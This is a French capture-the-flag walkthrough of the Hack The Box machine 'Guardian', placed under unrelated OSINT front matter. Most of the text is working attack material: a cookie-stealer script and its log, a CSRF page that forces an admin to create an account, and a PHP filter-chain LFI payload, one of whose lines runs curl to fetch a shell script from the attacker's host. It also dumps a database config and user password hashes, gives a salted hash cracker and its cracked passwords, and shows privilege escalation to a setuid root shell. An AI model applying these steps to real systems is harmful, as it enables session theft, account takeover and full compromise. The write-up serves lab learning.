Guardian
1
2
3
4
5
6
7
8
9
title: "OSINT : Techniques avancées pour les CTF et la Cybersécurité"
date: 2025-04-08
categories: [OSINT,HTB, THM]
tags: [osint, reconnaissance, investigations]
author: KET752SBAH # Votre pseudo
image: https://www.vaadata.com/blog/wp-content/uploads/2024/12/cyber-osint.png # Image thématique (1200x630 px)
description: "Découvrez les outils et méthodologies OSINT pour résoudre des challenges CTF et mener des investigations."
---
<script>
Reconnaissance:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
└─$ nmap -sC -sV 10.10.11.84 --min-rate 5000 -p- --vv
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-29 22:40 GMT
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 22:40
Completed NSE at 22:40, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 22:40
Completed NSE at 22:40, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 22:40
Completed NSE at 22:40, 0.00s elapsed
Initiating Ping Scan at 22:40
Scanning 10.10.11.84 [4 ports]
Completed Ping Scan at 22:40, 0.37s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 22:40
Scanning guardian.htb (10.10.11.84) [65535 ports]
Discovered open port 22/tcp on 10.10.11.84
Discovered open port 80/tcp on 10.10.11.84
Increasing send delay for 10.10.11.84 from 0 to 5 due to 1840 out of 6131 dropped probes since last increase.
Increasing send delay for 10.10.11.84 from 5 to 10 due to max_successful_tryno increase to 4
Increasing send delay for 10.10.11.84 from 10 to 20 due to max_successful_tryno increase to 5
Increasing send delay for 10.10.11.84 from 20 to 40 due to max_successful_tryno increase to 6
Increasing send delay for 10.10.11.84 from 40 to 80 due to max_successful_tryno increase to 7
Increasing send delay for 10.10.11.84 from 80 to 160 due to max_successful_tryno increase to 8
Increasing send delay for 10.10.11.84 from 160 to 320 due to max_successful_tryno increase to 9
Increasing send delay for 10.10.11.84 from 320 to 640 due to 5294 out of 17646 dropped probes since last increase.
Increasing send delay for 10.10.11.84 from 640 to 1000 due to 3937 out of 13121 dropped probes since last increase.
Completed SYN Stealth Scan at 22:40, 23.30s elapsed (65535 total ports)
Initiating Service scan at 22:40
Scanning 2 services on guardian.htb (10.10.11.84)
Completed Service scan at 22:40, 6.68s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.11.84.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 22:40
Completed NSE at 22:40, 7.15s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 22:40
Completed NSE at 22:40, 1.23s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 22:40
Completed NSE at 22:40, 0.01s elapsed
Nmap scan report for guardian.htb (10.10.11.84)
Host is up, received echo-reply ttl 63 (0.22s latency).
Scanned at 2025-10-29 22:40:02 GMT for 38s
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 9c:69:53:e1:38:3b:de:cd:42:0a:c8:6b:f8:95:b3:62 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEtPLvoTptmr4MsrtI0K/4A73jlDROsZk5pUpkv1rb2VUfEDKmiArBppPYZhUo+Fopcqr4j90edXV+4Usda76kI=
| 256 3c:aa:b9:be:17:2d:5e:99:cc:ff:e1:91:90:38:b7:39 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHTkehIuVT04tJc00jcFVYdmQYDY3RuiImpFenWc9Yi6
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.52
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-title: Guardian University - Empowering Future Leaders
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: Host: _default_; OS: Linux; CPE: cpe:/o:linux:linux_kernel
le sous domaine
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
└─$ sudo ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://guardian.htb/ -H "Host:FUZZ.guardian.htb" -fw 20
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.5.0-dev
________________________________________________
:: Method : GET
:: URL : http://guardian.htb/
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
:: Header : Host: FUZZ.guardian.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response words: 20
________________________________________________
portal [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 237ms]
cred -> GU0142023 : GU1234
vuln : IDOR
Cred -> jamil.enockson@guardian.htb : DHsNnk3V503
Vuln : XSS
https://www.treegrid.com/FSheet
1
2
3
4
5
6
7
8
9
10
└─$ cat cookiestealer.php
<?php
if (isset($_GET['c'])){
$cookies = $_GET['c'];
$file = fopen('cookies.txt', 'a');
fwrite($file, $cookies ."\n\n");
fclose($file);
}
?>
1
2
3
4
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.84 - - [30/Oct/2025 00:11:28] "GET /cookiestealer.php?c=PHPSESSID=n1m5fjq2lcmlu5i1gc59gtth0v HTTP/1.1" 200 -
j’ai accès au lecture portail maintenant je vais éssayé d’obtenir l’admin
j’ai analyser le code source du fichier de admin/notices/create.php
🔴 **Vulnérabilité : Cross-Site Scripting (XSS) non persisté
La vulnérabilité
La protection CSRF de cette application est défaillante pour deux raisons :
- Les jetons sont globaux : Tous les jetons CSRF générés, pour tous les utilisateurs, sont stockés dans un seul et même fichier (tokens.json). Un jeton généré pour vous sera considéré comme valide pour une requête faite par un administrateur.
- Les jetons ne sont pas invalidés : Un jeton n’est jamais supprimé après son utilisation. On peut donc le réutiliser.
Cela signifie que nous pouvons obtenir un jeton CSRF valide avec notre propre compte, puis l’utiliser dans une attaque CSRF contre un administrateur.
Scénario d’exploitation : Forcer la création d’un compte
Voici comment forcer un administrateur à vous créer un compte (qui sera lui-même administrateur).
Étape 1 : Obtenir un jeton CSRF valide
- Connectez-vous à l’application avec n’importe quel compte (même un compte étudiant).
- Accédez à une page qui génère un jeton CSRF. Par exemple, la page http://portal.guardian.htb/lecturer/notices/create.php (même si vous n’êtes pas un chargé de cours, la page peut quand même générer un jeton).
- Affichez le code source de la page et trouvez la valeur du csrf_token. Copiez-la.
Étape 2 : Créer la page web piégée
Créez un fichier HTML (par exemple, csrf_attack.html) avec le contenu suivant. Remplacez VOTRE_JETON_CSRF_VALIDE par le jeton que vous avez récupéré à l’étape 1.
exploit.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<html>
<body>
<script>
function submitForm() {
document.getElementById("csrf-form").submit();
}
window.onload = submitForm;
</script>
<h1>Veuillez patienter pendant le chargement de la page...</h1>
<form id="csrf-form" action="http://portal.guardian.htb/admin/createuser.php" method="POST" style="display:none;">
<input type="text" name="username" value="attaquant" />
<input type="password" name="password" value="password123" />
<input type="text" name="full_name" value="Attaquant" />
<input type="email" name="email" value="attaquant@evil.com" />
<input type="date" name="dob" value="2000-01-01" />
<input type="text" name="address" value="123 Rue du Hack" />
<input type="text" name="user_role" value="admin" />
<input type="hidden" name="csrf_token" value="VOTRE_JETON_CSRF_VALIDE" />
</form>
</body>
</html>
1
2
3
4
5
6
7
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.84 - - [30/Oct/2025 00:46:43] "GET /exploit.html HTTP/1.1" 200 -
10.10.11.84 - - [30/Oct/2025 00:46:43] code 404, message File not found
10.10.11.84 - - [30/Oct/2025 00:46:43] "GET /favicon.ico HTTP/1.1" 404 -
vuln: LFI
nous allons aussi analyser le fichier reports.php
J’ai analysé le fichier admin/reports.php et j’ai trouvé quelque chose de très intéressant. Le code est vulnérable à une inclusion de fichier local (LFI), mais il y a des protections en place.
Voici le code concerné :
1
2
3
4
5
6
7
8
9
\$report = $_GET['report'] ?? 'reports/academic.php';if (strpos($report, '..') !== false) {
die(" Malicious request blocked 🚫
");
}if (!preg_match('/^(.*(enrollment|academic|financial|system)\\.php)$/', /′,$report)) {
die(" Access denied. Invalid file 🚫
");
}include($report);
La vulnérabilité et les protections
- La faille (LFI) : La ligne include($report); inclut un fichier dont le chemin est fourni par l’utilisateur via le paramètre report dans l’URL. C’est une faille LFI classique.
- Protection 1 (Anti-Traversal) : Le code vérifie si .. est présent dans le chemin pour empêcher de remonter dans les répertoires. C’est une protection basique.
- Protection 2 (Regex) : Le code vérifie ensuite si le nom du fichier se termine bien par enrollment.php, academic.php, financial.php, ou system.php. C’est la protection la plus forte.
php://filter/convert.base64-encode/resource=reports/enrollment.php
nous allons utiliser le script php_filter_chain_generator.py
1
2
3
4
└─$ python3 php_filter_chain_generator.py --chain '<?php phpinfo(); ?>'
[+] The following gadget chain will generate the following code : <?php phpinfo(); ?> (base64 value: PD9waHAgcGhwaW5mbygpOyA/Pg)
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM891.CSUNICODE|convert.iconv.ISO8859-14.ISO6937|convert.iconv.BIG-FIVE.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.CP1163.CSA_T500|convert.iconv.UCS-2.MSCP949|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp,system.php
1
python3 php_filter_chain_generator.py --chain '<?php system("curl http://10.10.14.15/shell.sh -o /tmp/shell.sh"); ?>'
1
python3 php_filter_chain_generator.py --chain '<?php system("chmod +x /tmp/shell.sh"); ?>'
1
2
3
4
5
6
7
8
9
10
<?php
return [
'db' => [
'dsn' => 'mysql:host=localhost;dbname=guardiandb',
'username' => 'root',
'password' => 'Gu4rd14n_un1_1s_th3_b3st',
'options' => []
],
'salt' => '8Sb)tM1vs1SS'
];
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
mysql> desc users;
+---------------+------------------------------------+------+-----+-------------------+-----------------------------------------------+
| Field | Type | Null | Key | Default | Extra |
+---------------+------------------------------------+------+-----+-------------------+-----------------------------------------------+
| user_id | int | NO | PRI | NULL | auto_increment |
| username | varchar(255) | YES | UNI | NULL | |
| password_hash | varchar(255) | YES | | NULL | |
| full_name | varchar(255) | YES | | NULL | |
| email | varchar(255) | YES | | NULL | |
| dob | date | YES | | NULL | |
| address | text | YES | | NULL | |
| user_role | enum('student','lecturer','admin') | YES | | student | |
| status | enum('active','inactive') | YES | | active | |
| created_at | timestamp | YES | | CURRENT_TIMESTAMP | DEFAULT_GENERATED |
| updated_at | timestamp | YES | | CURRENT_TIMESTAMP | DEFAULT_GENERATED on update CURRENT_TIMESTAMP |
+---------------+------------------------------------+------+-----+-------------------+-----------------------------------------------+
11 rows in set (0.01 sec)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
mysql> select username, password_hash from users;
+--------------------+------------------------------------------------------------------+
| username | password_hash |
+--------------------+------------------------------------------------------------------+
| admin | 694a63de406521120d9b905ee94bae3d863ff9f6637d7b7cb730f7da535fd6d6 |
| jamil.enockson | c1d8dfaeee103d01a5aec443a98d31294f98c5b4f09a0f02ff4f9a43ee440250 |
| mark.pargetter | 8623e713bb98ba2d46f335d659958ee658eb6370bc4c9ee4ba1cc6f37f97a10e |
| valentijn.temby | 1d1bb7b3c6a2a461362d2dcb3c3a55e71ed40fb00dd01d92b2a9cd3c0ff284e6 |
| leyla.rippin | 7f6873594c8da097a78322600bc8e42155b2db6cce6f2dab4fa0384e217d0b61 |
| perkin.fillon | 4a072227fe641b6c72af2ac9b16eea24ed3751211fb6807cf4d794ebd1797471 |
| cyrus.booth | 23d701bd2d5fa63e1a0cfe35c65418613f186b4d84330433be6a42ed43fb51e6 |
| sammy.treat | c7ea20ae5d78ab74650c7fb7628c4b44b1e7226c31859d503b93379ba7a0d1c2 |
| crin.hambidge | 9b6e003386cd1e24c97661ab4ad2c94cc844789b3916f681ea39c1cbf13c8c75 |
| myra.galsworthy | ba227588efcb86dcf426c5d5c1e2aae58d695d53a1a795b234202ae286da2ef4 |
| mireielle.feek | 18448ce8838aab26600b0a995dfebd79cc355254283702426d1056ca6f5d68b3 |
| vivie.smallthwaite | b88ac7727aaa9073aa735ee33ba84a3bdd26249fc0e59e7110d5bcdb4da4031a |
| GU0142023 | 5381d07c15c0f0107471d25a30f5a10c4fd507abe322853c178ff9c66e916829 |
| GU6262023 | 87847475fa77edfcf2c9e0973a91c9b48ba850e46a940828dfeba0754586938f |
| GU0702025 | 48b16b7f456afa78ba00b2b64b4367ded7d4e3daebf08b13ff71a1e0a3103bb1 |
| GU0762023 | e7ff40179d9a905bc8916e020ad97596548c0f2246bfb7df9921cc8cdaa20ac2 |
| GU9492024 | 8ae72472bd2d81f774674780aef36fc20a0234e62cdd4889f7b5a6571025b8d1 |
| GU9612024 | cf54d11e432e53262f32e799c6f02ca2130ae3cff5f595d278d071ecf4aeaf57 |
| GU7382024 | 7852ec8fcfded3f1f6b343ec98adde729952b630bef470a75d4e3e0da7ceea1a |
| GU6632023 | 98687fb5e0d6c9004c09dadbe85b69133fd24d5232ff0a3cf3f768504e547714 |
| GU1922024 | bf5137eb097e9829f5cd41f58fc19ed472381d02f8f635b2e57a248664dd35cd |
| GU8032023 | 41b217df7ff88d48dac1884a8c539475eb7e7316f33d1ca5a573291cfb9a2ada |
| GU5852023 | e02610ca77a91086c85f93da430fd2f67f796aab177c88d789720ca9b724492a |
| GU0712023 | e6aad48962fd44e506ac16d81b5e4587cad2fd2dc51aabbf193f4fd29d036a7a |
| GU1592025 | 1710aed05bca122521c02bff141c259a81a435f900620306f92b840d4ba79c71 |
| GU1112023 | 168ae18404da4fff097f9218292ae8f93d6c3ac532e609b07a1c1437f2916a7d |
| GU6432025 | a28e58fd78fa52c651bfee842b1d3d8f5873ae00a4af56a155732a4a6be41bc6 |
| GU3042024 | d72fc47472a863fafea2010efe6cd4e70976118babaa762fef8b68a35814e9ab |
| GU1482025 | be0145f24b8f6943fd949b7ecaee55bb9d085eb3e81746826374c52e1060785f |
| GU3102024 | 3aa2232d08262fca8db495c84bd45d8c560e634d5dff8566f535108cf1cc0706 |
| GU7232023 | 4813362e8d6194abfb20154ba3241ade8806445866bce738d24888aa1aa9bea6 |
| GU8912024 | 6c249ab358f6adfc67aecb4569dae96d8a57e3a64c82808f7cede41f9a330c51 |
| GU4752025 | 4d7625ec0d45aa83ef374054c8946497a798ca6a3474f76338f0ffe829fced1a |
| GU9602024 | 6eeb4b329b7b7f885df9757df3a67247df0a7f14b539f01d3cb988e4989c75e2 |
| GU4382025 | 8d57c0124615f5c82cabfdd09811251e7b2d70dcf2d3a3b3942a31c294097ec8 |
| GU7352023 | 8c9a8f4a6daceecb6fff0eae3830d16fe7e05a98101cb21f1b06d592a33cb005 |
| GU3042025 | 1d87078236f9da236a92f42771749dad4eea081a08a5da2ed3fa5a11d85fa22f |
| GU3872024 | 12a2fe5b87191fedadc7d81dee2d483ab2508650d96966000f8e1412ca9cd74a |
| GU7462025 | 5e95bfd3675d0d995027c392e6131bf99cf2cfba73e08638fa1c48699cdb9dfa |
| GU3902023 | 6b4502ad77cf9403e9ac3338ff7da1c08688ef2005dae839c1cd6e07e1f6409b |
| GU1832025 | 6ab453e985e31ef54419376be906f26fff02334ec5f26a681d90c32aec6d311f |
| GU3052024 | 1cde419d7f3145bcfcbf9a34f80452adf979f71496290cf850944d527cda733f |
| GU3612023 | 7ba8a71e39c1697e0bfa66052285157d2984978404816c93c2a3ddaba6455e3a |
| GU7022023 | 7a02cc632b8cb1a6f036cb2c963c084ffea9184a92259d932e224932fdad81a8 |
| GU1712025 | ebfa2119ebe2aaed2c329e25ce2e5ed8efa2d78e72c273bb91ff968d02ee5225 |
| GU9362023 | 8b7ce469fb40e88472c9006cb1d65ffa20b2f9c41e983d49ca0cdf642d8f1592 |
| GU5092024 | 11ae26f27612b1adca57f14c379a8cc6b4fc5bdfcfd21bef7a8b0172b7ab4380 |
| GU5252023 | 70a03bb2060c5e14b33c393970e655f04d11f02d71f6f44715f6fe37784c64fa |
| GU8802025 | 7ae4ac47f05407862cb2fcd9372c73641c822bbc7fc07ed9d16e6b63c2001d76 |
| GU2222023 | d3a175c6e9da02ae83ef1f2dd1f59e59b8a63e5895b81354f7547714216bbdcd |
| GU9802023 | a03da309de0a60f762ce31d0bde5b9c25eb59e740719fc411226a24e72831f5c |
| GU3122025 | e96399fcdb8749496abc6d53592b732b1b2acb296679317cf59f104a5f51343a |
| GU2062025 | 0ece0b43e6019e297e0bce9f07f200ff03d629edbed88d4f12f2bad27e7f4df8 |
| GU3992025 | b86518d246a22f4f5938444aa18f2893c4cccabbe90ca48a16be42317aec96a0 |
| GU1662024 | 5c28cd405a6c0543936c9d010b7471436a7a33fa64f5eb3e84ab9f7acc9a16e5 |
| GU9972025 | 339d519ef0c55e63ebf4a8fde6fda4bca4315b317a1de896fb481bd0834cc599 |
| GU6822025 | 298560c0edce3451fd36b69a15792cbb637c8366f058cf674a6964ff34306482 |
| GU7912023 | 8236b81b5f67c798dd5943bca91817558e987f825b6aae72a592c8f1eaeee021 |
| GU3622024 | 1c92182d9a59d77ea20c0949696711d8458c870126cf21330f61c2cba6ae6bcf |
| GU2002023 | 3c378b73442c2cf911f2a157fc9e26ecde2230313b46876dab12a661169ed6e2 |
| GU3052023 | 2ef01f607f86387d0c94fc2a3502cc3e6d8715d3b1f124b338623b41aed40cf8 |
| GU1462023 | 585aacf74b22a543022416ed771dca611bd78939908c8323f4f5efef5b4e0202 |
+--------------------+------------------------------------------------------------------+
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
#!/usr/bin/env python3
"""
Script simple pour cracker les hashs SHA-256 avec salt et rockyou.txt
"""
import hashlib
# Configuration
SALT = '8Sb)tM1vs1SS'
WORDLIST_PATH = '/usr/share/wordlists/rockyou.txt'
HASHES_FILE = 'hashes.txt'
OUTPUT_FILE = 'cracked.txt'
def crack_hashes():
# Charger les hashs
users = {}
with open(HASHES_FILE, 'r') as f:
for line in f:
if ':' in line:
username, hash_val = line.strip().split(':', 1)
users[username] = hash_val.lower()
print(f"[+] {len(users)} hashs chargés")
# Résultats
cracked = {}
# Essayer les deux méthodes
methods = [
('password + salt', lambda p: p + SALT),
('salt + password', lambda p: SALT + p)
]
for method_name, hash_func in methods:
print(f"\n[*] Essai méthode: {method_name}")
with open(WORDLIST_PATH, 'r', encoding='utf-8', errors='ignore') as f:
for line_num, password in enumerate(f, 1):
password = password.strip()
if not password:
continue
# Générer le hash
data = hash_func(password)
hash_candidate = hashlib.sha256(data.encode()).hexdigest()
# Vérifier tous les utilisateurs
for username, real_hash in users.items():
if username not in cracked and hash_candidate == real_hash:
cracked[username] = password
print(f"[+] CRACKÉ: {username} -> {password}")
# Progress
if line_num % 100000 == 0:
print(f"[*] {line_num} mots de passe testés... {len(cracked)} trouvés")
# Arrêter si tout est cracké
if len(cracked) >= len(users):
break
if len(cracked) >= len(users):
break
# Sauvegarder les résultats
with open(OUTPUT_FILE, 'w') as f:
for username, password in cracked.items():
f.write(f"{username}:{password}\n")
# Afficher le résumé
print(f"\n[+] TERMINÉ: {len(cracked)}/{len(users)} mots de passe crackés")
print(f"[+] Résultats sauvegardés dans: {OUTPUT_FILE}")
if __name__ == "__main__":
crack_hashes()
1
2
3
4
└─$ cat cracked.txt
jamilenockson:copperhouse56
admin:fakebake000
1
2
3
4
5
6
7
www-data@guardian:~/portal.guardian.htb/admin$ cd /home
www-data@guardian:/home$ ls
gitea jamil mark sammy
www-data@guardian:/home$ su jamil
Password:
jamil@guardian:/home$ ls
1
2
3
4
5
6
7
8
9
10
jamil@guardian:~$ sudo -l
Matching Defaults entries for jamil on guardian:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User jamil may run the following commands on guardian:
(mark) NOPASSWD: /opt/scripts/utilities/utilities.py
jamil@guardian:~$
1
2
3
echo 'import os; os.system("/bin/bash")' > /opt/scripts/utilities/utils/status.py
sudo -u mark cp /optsudo -u mark /opt/scripts/utilities/utilities.py system-status
1
2
3
mark@guardian:/opt/scripts/utilities/utils$ id
uid=1001(mark) gid=1001(mark) groups=1001(mark),1002(admins)
1
2
3
4
5
6
7
8
9
mark@guardian:~$ sudo -l
Matching Defaults entries for mark on guardian:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User mark may run the following commands on guardian:
(ALL) NOPASSWD: /usr/local/bin/safeapache2ctl
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
# Créer le répertoire de configuration
mkdir -p /home/mark/confs
# Créer le fichier de configuration Apache malveillant
cat > /home/mark/confs/root.conf << 'EOF'
ServerName localhost
LoadModule mpm_event_module /usr/lib/apache2/modules/mod_mpm_event.so
ErrorLog "|/bin/sh -c 'cp /bin/bash /tmp/rootbash && chmod 4755 /tmp/rootbash'"
Listen 127.0.0.1:8080
EOF
# Exécuter Apache avec la configuration malveillante
sudo /usr/local/bin/safeapache2ctl -f /home/mark/confs/root.conf
# Utiliser le binaire rootbash pour obtenir un shell root
/tmp/rootbash -p
This post is licensed under
CC BY 4.0
by the author.